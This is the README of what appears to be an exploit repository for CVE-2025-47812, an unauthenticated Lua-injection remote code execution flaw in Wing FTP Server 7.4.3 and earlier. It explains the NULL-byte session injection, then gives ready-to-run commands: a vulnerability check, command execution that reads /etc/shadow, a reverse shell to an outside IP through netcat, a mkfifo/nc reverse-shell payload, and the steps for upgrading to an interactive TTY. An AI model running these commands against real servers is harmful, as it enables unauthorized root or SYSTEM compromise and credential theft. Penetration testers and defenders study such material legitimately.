0xS4N4TG/CVE-2025-47812

# CVE-2025-47812 — Wing FTP Server 未授权 RCE（重写） 针对 Wing FTP Server ≤ 7.4.3 中未授权的 Lua 注入 RCE 的 Python 利用脚本。专为 shell 投递设计——从 `check` 到获得一个可用的 netcat 回调，只需一条命令。 ## 漏洞摘要 Wing FTP 的 `c_CheckUser()` 在认证时会在第一个 NULL 字节处截断 `username`，但会话创建路径会将完整的、未经清理的用户名写入 Lua 会话文件。注入 `anonymous%00]]--`，服务器便会愉快地将你的 Lua 代码写入会话中。访问任意需要认证的端点（`dir.html` 即可生效）会通过 `loadfile()` → `f()` 加载该会话文件，从而以 `root` / `SYSTEM` 权限执行注入的代码。 影响范围：Wing FTP Server ≤ 7.4.3。已在 7.4.4 中修复。 ## 安装 ``` pip install requests ``` 仅此而已——无其他依赖。 ## 使用方法 ``` # 确认目标存在漏洞（运行 `id` 并检查 `uid=`） python3 exploit.py -u http://target:5466/ check # 一次性命令——捕获 stdout 和 stderr python3 exploit.py -u http://target:5466/ exec "id" python3 exploit.py -u http://target:5466/ exec "cat /etc/shadow" python3 exploit.py -u http://target:5466/ exec "find / -perm -4000 2>/dev/null" # 反向 shell（简单方法） # Terminal 1: nc -lvnp 4444 # Terminal 2: python3 exploit.py -u http://target:5466/ shell 10.10.14.5 4444 # 分离的任意 payload——发射后不管。当缺少 bash 时有用： python3 exploit.py -u http://target:5466/ detached \ "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f" ``` ### 选项 | 标志 | 默认值 | 说明 | |------|--------|------| | `-u`, `--url` | 必需 | 目标基础 URL——Wing FTP 通常监听在 `:5466`（HTTP）或 `:5467`（HTTPS）。 | | `-U`, `--username` | `anonymous` | NULL 字节前的用户名。默认安装中匿名用户可正常使用。 | | `-P`, `--password` | 空 | 注入 POST 请求的密码。匿名用户留空即可。 | | `-v`, `--verbose` | 关闭 | 输出 Lua 载荷、访问的 URL 及原始响应体。 | ### 提示 - 首先确认端口。Web 界面**默认不在** 80 端口——在浏览器中尝试 `http://target:5466/login.html`，不要直接假设 URL 错了。 - 如果 `shell` 模式未能获得回调，请回退到 `detached` 模式并使用上述 `mkfifo` 载荷。某些精简的 Linux 镜像没有预装 `bash`。 - 获得 shell 后提升为交互式 shell： python3 -c 'import pty;pty.spawn("/bin/bash")' # Ctrl+Z stty raw -echo; fg # 回车，回车 export TERM=xterm ## 免责声明 仅用于教育目的和授权的安全测试。你需自行负责使用本工具指向的目标。 ## 许可证 MIT — 参见 [LICENSE](./LICENSE)。

标签：CISA项目, CVE-2025-47812, Lua注入, Maven, Python, Wing FTP Server, 会话注入, 反向shell, 命令执行, 威胁模拟, 提权, 数据展示, 文件写入, 无后门, 服务器漏洞, 未授权漏洞, 模糊测试, 漏洞验证, 红队, 编程工具, 远程代码执行, 逆向工具